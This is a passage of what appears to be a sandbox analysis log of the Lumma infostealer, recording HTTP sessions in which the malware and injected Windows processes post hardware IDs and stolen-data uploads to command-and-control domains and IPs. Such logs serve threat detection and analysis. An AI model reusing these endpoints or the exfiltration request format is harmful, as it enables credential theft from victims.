32	192.168.2.4	62299	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:40 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: liernessfornicsa.shop
2024-07-27 05:44:40 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 05:44:40 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-27 05:44:40 UTC	816	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4b0rpq4v4qtc77jnhqdti23b1s; expires=Tue, 19-Nov-2024 23:31:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2BjL%2BI1JYlQqlb%2FikSBI9PWhgCGpGt%2FcCwC3jDHCssH4WiMMszEn%2FRutxsFtQKN1FF%2F%2BjzP3i6Wp3euEgTdFPYJY8v4K76Cq8f2bhnl7Xw6UxrH08%2FfNk6SwwWI8NhDnNLqB4U1y26o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a51a35c368ca8-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	62300	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:40 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:40 UTC	1267	OUT	Data Raw: 41 68 58 65 33 6b 6a 65 32 30 30 70 64 4a 61 71 59 68 51 6f 6e 53 47 39 4f 31 6f 30 4c 31 55 70 62 74 4a 79 78 35 52 6e 55 48 33 6d 4d 48 7a 52 69 6b 65 2b 38 52 37 42 79 71 49 79 5a 67 34 4b 47 77 58 73 54 37 59 45 78 33 65 57 6d 77 6c 6b 5a 50 6b 68 30 74 59 53 67 53 46 67 70 2f 72 59 4a 34 52 5a 4e 72 75 44 53 45 70 58 65 33 6e 4f 61 5a 35 71 4a 33 4e 57 79 31 77 41 41 4f 74 4a 37 56 63 4d 6b 4b 63 4f 75 77 78 59 79 52 73 46 4b 6e 6e 39 67 76 2f 51 37 6e 39 4b 33 6d 41 65 78 5a 7a 4c 45 36 37 75 48 6e 35 79 30 54 79 48 32 35 36 7a 36 46 4e 64 4e 2b 50 77 4d 36 68 68 50 45 56 71 38 73 5a 37 48 66 38 57 2f 72 61 6d 4d 75 49 48 56 67 59 39 6d 4d 41 73 65 2b 44 6a 48 6c 38 64 52 61 74 53 46 6a 53 5a 68 72 7a 4c 78 7a 4c 63 36 35 43 45 55 2b 56 51 6f 44 71 Data Ascii: AhXe3kje200pdJaqYhQonSG9O1o0L1UpbtJyx5RnUH3mMHzRike+8R7ByqIyZg4KGwXsT7YEx3eWmwlkZPkh0tYSgSFgp/rYJ4RZNruDSEpXe3nOaZ5qJ3NWy1wAAOtJ7VcMkKcOuwxYyRsFKnn9gv/Q7n9K3mAexZzLE67uHn5y0TyH256z6FNdN+PwM6hhPEVq8sZ7Hf8W/ramMuIHVgY9mMAse+DjHl8dRatSFjSZhrzLxzLc65CEU+VQoDq
2024-07-27 05:44:41 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:41 UTC	685	IN	Data Raw: 76 75 2b 53 59 6c 6e 46 57 66 4d 38 53 79 4c 39 75 51 64 6b 5a 50 63 50 73 72 4f 49 53 4d 72 34 70 63 6e 69 58 6c 44 4e 4e 50 51 44 42 59 38 33 55 4b 5a 54 6b 51 5a 42 74 45 73 57 70 32 4d 49 4f 72 31 64 64 52 57 47 6d 75 6d 56 4b 34 4e 2b 58 43 38 69 72 39 4f 77 30 36 37 49 58 4a 77 32 54 75 57 7a 31 4b 4d 68 59 53 7a 77 51 6b 39 63 4f 4b 35 2f 50 6e 46 68 62 32 51 30 55 2f 65 41 42 79 2f 5a 61 48 4b 46 71 75 37 45 55 5a 71 77 76 6d 70 38 71 76 54 65 63 57 6c 66 73 4f 50 6e 72 76 38 38 65 39 61 69 77 72 46 33 65 49 78 2f 68 5a 61 6f 30 30 57 56 34 63 59 4b 58 7a 6c 4e 7a 77 35 50 49 42 68 79 78 68 53 32 42 54 66 59 74 76 48 44 30 59 61 66 4f 7a 58 76 52 33 55 62 33 62 37 42 6d 51 52 34 57 5a 4b 71 4d 4a 46 34 58 74 6a 59 64 79 71 30 58 77 71 54 39 39 6a Data Ascii: vu+SYlnFWfM8SyL9uQdkZPcPsrOISMr4pcniXlDNNPQDBY83UKZTkQZBtEsWp2MIOr1ddRWGmumVK4N+XC8ir9Ow067IXJw2TuWz1KMhYSzwQk9cOK5/PnFhb2Q0U/eABy/ZaHKFqu7EUZqwvmp8qvTecWlfsOPnrv88e9aiwrF3eIx/hZao00WV4cYKXzlNzw5PIBhyxhS2BTfYtvHD0YafOzXvR3Ub3b7BmQR4WZKqMJF4XtjYdyq0XwqT99j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	62301	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:42 UTC	1122	OUT	Data Raw: 44 7a 4b 73 48 6c 47 53 34 79 57 57 4f 75 6c 6f 30 51 73 4a 61 56 2b 4b 6f 47 54 53 6c 6b 6f 6c 4e 4a 4b 33 62 30 6c 2f 42 49 46 47 68 31 6c 67 34 6d 51 33 72 77 4a 49 64 44 4e 71 61 6a 48 75 54 4c 34 41 48 4b 5a 6a 33 38 48 2b 4e 58 4e 52 6d 6b 71 76 73 41 6b 64 51 61 2b 50 71 54 69 6a 58 73 56 68 76 74 33 68 41 4c 32 71 46 54 72 74 48 52 7a 79 4d 62 50 38 6e 35 59 33 49 33 76 62 72 6d 41 48 71 38 70 33 61 6a 53 2f 6d 68 68 49 76 61 62 61 39 51 74 6f 71 6d 33 76 62 63 52 37 59 54 6e 64 6d 31 59 6b 44 5a 41 66 55 4e 55 45 44 39 4d 49 6d 6d 64 64 77 67 5a 79 54 39 50 68 50 44 50 69 55 43 41 53 36 71 4b 6e 2f 63 2f 77 69 43 37 59 78 58 57 63 6a 55 39 7a 4e 71 6d 48 5a 58 48 53 76 59 52 5a 4e 58 45 32 58 4b 54 62 51 36 52 38 64 78 32 46 6f 33 32 69 74 31 2b Data Ascii: DzKsHlGS4yWWOulo0QsJaV+KoGTSlkolNJK3b0l/BIFGh1lg4mQ3rwJIdDNqajHuTL4AHKZj38H+NXNRmkqvsAkdQa+PqTijXsVhvt3hAL2qFTrtHRzyMbP8n5Y3I3vbrmAHq8p3ajS/mhhIvaba9Qtoqm3vbcR7YTndm1YkDZAfUNUED9MImmddwgZyT9PhPDPiUCAS6qKn/c/wiC7YxXWcjU9zNqmHZXHSvYRZNXE2XKTbQ6R8dx2Fo32it1+
2024-07-27 05:44:43 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:43 UTC	685	IN	Data Raw: 71 79 57 4b 71 4e 57 62 32 50 68 41 67 67 61 36 2b 2f 4b 6c 67 4b 33 36 76 69 41 69 2f 4e 30 38 4b 32 6c 6b 6e 49 70 48 52 62 53 6a 65 4a 4d 62 53 58 4c 33 54 67 2f 65 4b 31 47 6d 77 54 58 41 73 61 31 36 61 2b 34 63 49 4e 34 71 62 32 31 75 73 33 54 33 46 5a 52 38 2b 62 79 42 68 35 48 77 75 75 69 50 6b 50 48 71 47 71 66 6a 54 50 4d 48 43 42 4f 53 67 4b 36 36 70 47 2b 64 36 4a 31 41 69 71 33 59 5a 43 64 36 74 78 49 69 35 66 4b 48 71 61 7a 72 35 41 42 76 4f 32 64 2f 6d 42 32 73 2b 6c 61 6c 6c 59 2b 6a 32 66 75 39 44 70 32 7a 46 4e 6c 39 4e 65 2f 53 46 6d 6f 33 49 4e 35 61 49 31 63 38 51 65 44 69 4d 2b 6f 73 74 72 38 30 56 63 66 72 47 4f 6c 6f 4a 63 6e 2b 59 73 7a 6d 72 30 78 2b 33 44 37 55 64 51 52 48 68 45 50 2b 69 48 71 62 47 43 51 65 59 79 45 2f 7a 31 44 Data Ascii: qyWKqNWb2PhAgga6+/KlgK36viAi/N08K2lknIpHRbSjeJMbSXL3Tg/eK1GmwTXAsa16a+4cIN4qb21us3T3FZR8+byBh5HwuuiPkPHqGqfjTPMHCBOSgK66pG+d6J1Aiq3YZCd6txIi5fKHqazr5ABvO2d/mB2s+lallY+j2fu9Dp2zFNl9Ne/SFmo3IN5aI1c8QeDiM+ostr80VcfrGOloJcn+Yszmr0x+3D7UdQRHhEP+iHqbGCQeYyE/z1D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	62302	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:42 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: callosallsaospz.shop
2024-07-27 05:44:42 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 Data Ascii: act=get_message&ver=4.0&lid=bOKHNM--&j=&hwid=AA071A36DA472AA18C0E5F784EBF856B
2024-07-27 05:44:43 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1tjmtljf8q5cfjnct8qd09lpja; expires=Tue, 19-Nov-2024 23:31:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G19Z%2FpPBgqwmSpS7CSbK%2FU9naje%2FrD03YJ7g%2FtmBS2Hv8bWT6ydHRP8HngSxZMlap%2B6DecbUhYb4IhzV1TAcvhkdlq8M62Fxeu2p8FVR2RpvLXYmAZbs1mvhZ8hlOLqN2StltPCTmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a51b21d11c484-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:43 UTC	54	IN	Data Raw: 33 30 0d 0a 4e 63 55 38 6d 77 48 4f 73 4a 4f 6c 4f 61 76 41 4f 69 77 56 38 38 31 55 2f 59 6a 75 47 61 42 46 43 65 54 73 53 52 49 63 55 6a 42 75 6d 41 3d 3d 0d 0a Data Ascii: 30NcU8mwHOsJOlOavAOiwV881U/YjuGaBFCeTsSRIcUjBumA==
2024-07-27 05:44:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	62303	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:44 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:44 UTC	1267	OUT	Data Raw: 57 4d 6f 51 2f 43 6c 73 51 54 63 4d 5a 36 39 44 68 65 56 42 70 62 45 71 4c 41 6e 42 73 62 4a 46 46 4e 65 7a 55 6d 33 48 34 42 59 63 54 35 47 58 46 6c 46 73 74 59 4a 33 31 2b 74 64 35 36 6c 34 73 63 79 45 62 48 6a 77 39 63 58 7a 52 50 63 31 4d 54 44 63 47 4b 2b 39 33 58 33 37 77 5a 66 63 72 6c 61 64 32 53 38 43 70 45 30 35 76 70 74 62 70 6e 54 63 55 36 42 71 4d 49 74 4b 53 49 46 4c 43 73 58 61 44 6e 39 52 71 5a 42 57 63 6e 65 78 69 63 41 6f 35 37 30 64 71 75 76 51 43 5a 2f 70 39 72 55 55 69 33 33 4a 4f 49 31 45 78 67 38 74 70 6b 34 4f 6f 30 6c 45 4e 6e 67 4d 71 57 6c 54 4f 79 37 70 6b 5a 7a 30 54 32 4e 51 76 49 63 52 75 77 71 32 34 77 76 37 70 2b 5a 66 47 4a 57 4f 63 5a 72 44 52 33 6f 31 58 56 2b 2f 62 66 64 6e 4f 57 69 45 77 75 4a 6e 48 4d 48 2f 74 6c 41 Data Ascii: WMoQ/ClsQTcMZ69DheVBpbEqLAnBsbJFFNezUm3H4BYcT5GXFlFstYJ31+td56l4scyEbHjw9cXzRPc1MTDcGK+93X37wZfcrlad2S8CpE05vptbpnTcU6BqMItKSIFLCsXaDn9RqZBWcnexicAo570dquvQCZ/p9rUUi33JOI1Exg8tpk4Oo0lENngMqWlTOy7pkZz0T2NQvIcRuwq24wv7p+ZfGJWOcZrDR3o1XV+/bfdnOWiEwuJnHMH/tlA
2024-07-27 05:44:45 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:45 UTC	685	IN	Data Raw: 75 39 44 39 6f 54 35 56 55 33 53 4d 34 76 2b 47 79 55 4b 55 57 78 50 43 57 63 48 35 48 6e 54 56 38 47 4f 37 42 67 4d 36 43 56 4b 61 6e 31 54 51 65 49 77 71 4c 67 68 41 79 51 57 61 76 51 52 66 65 51 4c 52 74 33 65 30 44 6f 2b 6f 74 74 52 46 44 75 38 73 41 32 79 33 7a 55 61 31 51 32 6d 4a 47 36 35 46 56 37 76 58 49 37 64 37 39 66 4e 4c 69 54 79 46 57 34 48 4c 76 78 78 44 4c 6a 5a 30 72 72 30 56 38 70 6a 51 68 79 4d 4a 54 49 4b 59 51 78 75 4b 78 57 51 56 51 4c 44 76 53 4a 64 51 47 64 46 4b 54 56 65 71 31 76 68 77 66 51 47 54 67 4f 6b 34 50 5a 2b 74 39 6a 61 36 37 51 2f 72 6c 51 61 7a 36 4e 6e 2f 73 41 52 45 6c 4c 31 39 31 36 7a 61 71 33 64 53 6e 73 39 4d 4e 6f 79 39 6e 45 52 56 31 77 39 50 36 4c 59 38 4c 70 7a 7a 61 4e 52 37 33 4e 64 4f 32 4c 31 58 66 55 42 Data Ascii: u9D9oT5VU3SM4v+GyUKUWxPCWcH5HnTV8GO7BgM6CVKan1TQeIwqLghAyQWavQRfeQLRt3e0Do+ottRFDu8sA2y3zUa1Q2mJG65FV7vXI7d79fNLiTyFW4HLvxxDLjZ0rr0V8pjQhyMJTIKYQxuKxWQVQLDvSJdQGdFKTVeq1vhwfQGTgOk4PZ+t9ja67Q/rlQaz6Nn/sARElL1916zaq3dSns9MNoy9nERV1w9P6LY8LpzzaNR73NdO2L1XfUB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	62304	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:46 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:46 UTC	1122	OUT	Data Raw: 61 52 33 4f 41 56 75 48 49 72 43 74 66 6f 44 6b 42 54 49 69 75 42 36 4d 5a 67 75 45 33 36 31 30 64 46 69 41 66 38 58 4c 71 74 74 64 2f 37 45 54 53 44 41 65 77 33 68 73 4e 4f 36 79 4a 6b 45 72 6b 72 50 49 6a 4a 59 49 53 36 45 4b 49 41 7a 69 53 6b 35 45 73 66 30 58 45 78 39 51 56 34 74 58 52 74 50 62 76 2b 2f 68 35 55 6c 69 50 75 63 54 4e 66 78 2b 33 6c 4c 64 41 59 45 55 71 41 50 68 66 74 74 33 4c 58 50 4e 47 38 79 33 78 4d 63 73 6c 45 50 6e 51 73 37 34 35 79 78 47 4c 2f 43 67 70 34 50 75 45 62 43 69 58 6f 35 53 54 56 4f 33 75 62 61 66 4b 39 54 50 57 78 52 50 73 55 73 68 67 59 65 33 6f 2b 65 2b 32 34 54 43 5a 61 6a 59 74 45 30 4a 4e 4f 33 59 4f 75 44 6a 43 34 33 58 70 4d 71 76 74 49 69 70 6d 38 6d 59 6c 4b 31 6d 33 38 79 73 71 54 38 39 43 6f 6c 4d 56 34 6a Data Ascii: aR3OAVuHIrCtfoDkBTIiuB6MZguE3610dFiAf8XLqttd/7ETSDAew3hsNO6yJkErkrPIjJYIS6EKIAziSk5Esf0XEx9QV4tXRtPbv+/h5UliPucTNfx+3lLdAYEUqAPhftt3LXPNG8y3xMcslEPnQs745yxGL/Cgp4PuEbCiXo5STVO3ubafK9TPWxRPsUshgYe3o+e+24TCZajYtE0JNO3YOuDjC43XpMqvtIipm8mYlK1m38ysqT89ColMV4j
2024-07-27 05:44:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:47 UTC	685	IN	Data Raw: 4c 4a 32 46 48 73 74 6e 33 47 4f 38 35 58 6d 5a 63 58 4f 4d 50 66 73 64 5a 72 39 33 73 48 67 39 37 74 76 2f 35 4e 55 53 36 4e 46 30 32 69 72 5a 55 45 66 52 6d 54 35 38 37 54 44 36 6f 35 79 36 70 63 56 49 41 43 76 34 50 43 51 59 67 4a 66 4a 54 49 7a 46 59 4d 30 79 36 39 4c 58 36 70 49 71 52 59 78 2f 4e 4e 4b 39 6f 37 54 56 4c 45 44 74 59 2b 4b 42 7a 6d 57 46 47 56 5a 41 54 39 33 48 41 72 4e 52 6c 33 49 4d 6a 48 42 75 45 6e 76 74 44 65 38 33 55 31 6c 74 38 73 4c 44 44 45 43 6b 43 6e 4f 48 33 6a 45 64 4c 4e 76 50 4c 42 55 2f 43 35 70 70 42 50 79 7a 30 52 31 64 52 76 51 2f 51 6f 49 45 4f 63 65 55 67 7a 45 37 6b 48 2b 6c 45 66 75 78 55 43 51 63 31 55 67 51 75 5a 5a 79 54 64 55 47 63 69 48 4b 43 68 5a 78 6c 71 64 76 77 58 64 42 4d 52 55 71 4c 78 58 39 74 2b 52 Data Ascii: LJ2FHstn3GO85XmZcXOMPfsdZr93sHg97tv/5NUS6NF02irZUEfRmT587TD6o5y6pcVIACv4PCQYgJfJTIzFYM0y69LX6pIqRYx/NNK9o7TVLEDtY+KBzmWFGVZAT93HArNRl3IMjHBuEnvtDe83U1lt8sLDDECkCnOH3jEdLNvPLBU/C5ppBPyz0R1dRvQ/QoIEOceUgzE7kH+lEfuxUCQc1UgQuZZyTdUGciHKChZxlqdvwXdBMRUqLxX9t+R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	62305	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:48 UTC	1122	OUT	Data Raw: 47 7a 69 39 58 44 4d 52 61 67 69 48 6e 69 69 36 77 6c 54 31 44 55 6d 6c 6e 4f 54 6f 4a 77 6c 6a 6b 6d 6d 43 46 34 39 75 38 37 56 44 76 6e 32 66 39 77 4c 79 74 4d 62 35 31 54 77 54 66 48 50 6d 4a 6f 71 69 35 31 64 59 2f 59 51 4b 66 53 47 52 57 45 35 63 31 44 64 77 4d 46 57 34 34 4d 57 64 39 34 4b 68 36 57 6d 68 36 57 2b 69 51 6b 6c 50 61 6e 50 74 37 53 4b 42 73 31 43 6b 42 42 78 56 4d 5a 77 69 74 4b 4b 4b 77 4d 63 76 46 6a 71 41 42 31 35 7a 6c 66 61 53 56 73 4e 67 57 4d 4d 63 44 35 38 65 2b 31 54 49 7a 43 63 49 5a 65 57 75 57 4f 6f 41 4e 57 44 78 6a 45 33 53 2f 51 57 39 48 4d 4e 78 34 71 57 4b 69 35 30 56 46 54 4f 52 64 69 50 51 6a 6c 65 72 4a 41 49 44 63 39 74 33 52 2b 6a 51 33 51 72 4e 39 6b 36 47 36 61 6d 69 36 78 50 65 63 4f 6b 61 44 70 62 5a 7a 75 6f Data Ascii: Gzi9XDMRagiHnii6wlT1DUmlnOToJwljkmmCF49u87VDvn2f9wLytMb51TwTfHPmJoqi51dY/YQKfSGRWE5c1DdwMFW44MWd94Kh6Wmh6W+iQklPanPt7SKBs1CkBBxVMZwitKKKwMcvFjqAB15zlfaSVsNgWMMcD58e+1TIzCcIZeWuWOoANWDxjE3S/QW9HMNx4qWKi50VFTORdiPQjlerJAIDc9t3R+jQ3QrN9k6G6ami6xPecOkaDpbZzuo
2024-07-27 05:44:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:49 UTC	685	IN	Data Raw: 51 4a 2f 6b 32 6e 63 6b 30 49 35 6b 56 53 6a 44 56 53 74 55 53 6b 49 6e 4c 42 72 4c 79 7a 44 53 64 73 56 5a 7a 41 73 4a 4f 4a 57 69 68 65 70 49 77 7a 74 53 61 41 55 4f 79 2f 65 4e 74 6c 6c 4e 52 69 79 79 4b 72 4a 78 46 58 55 59 56 79 77 6c 75 65 4e 69 2f 46 65 48 75 78 4f 41 45 45 65 67 38 37 67 59 47 66 66 53 73 49 76 73 46 6f 6b 56 5a 41 2b 41 6a 75 36 4e 77 77 50 45 65 73 59 7a 62 67 42 62 41 4e 52 71 61 4e 64 63 74 6b 30 35 45 53 6b 54 31 31 6c 45 73 2b 50 33 79 35 6f 53 77 64 74 41 58 34 72 6f 64 73 66 49 52 6b 6e 42 36 4d 4a 78 57 30 76 75 30 4b 71 68 58 54 58 71 58 31 61 72 73 48 73 6a 65 63 37 57 4c 30 2b 47 4d 7a 59 79 43 67 37 65 73 78 2b 52 4d 32 37 59 4c 4f 6e 46 6f 66 56 71 32 51 6d 30 57 73 74 48 5a 69 6e 45 78 2f 70 62 65 2f 63 4d 4a 2f 67 Data Ascii: QJ/k2nck0I5kVSjDVStUSkInLBrLyzDSdsVZzAsJOJWihepIwztSaAUOy/eNtllNRiyyKrJxFXUYVywlueNi/FeHuxOAEEeg87gYGffSsIvsFokVZA+Aju6NwwPEesYzbgBbANRqaNdctk05ESkT11lEs+P3y5oSwdtAX4rodsfIRknB6MJxW0vu0KqhXTXqX1arsHsjec7WL0+GMzYyCg7esx+RM27YLOnFofVq2Qm0WstHZinEx/pbe/cMJ/g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	62306	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:49 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1268 Host: liernessfornicsa.shop
2024-07-27 05:44:49 UTC	1268	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
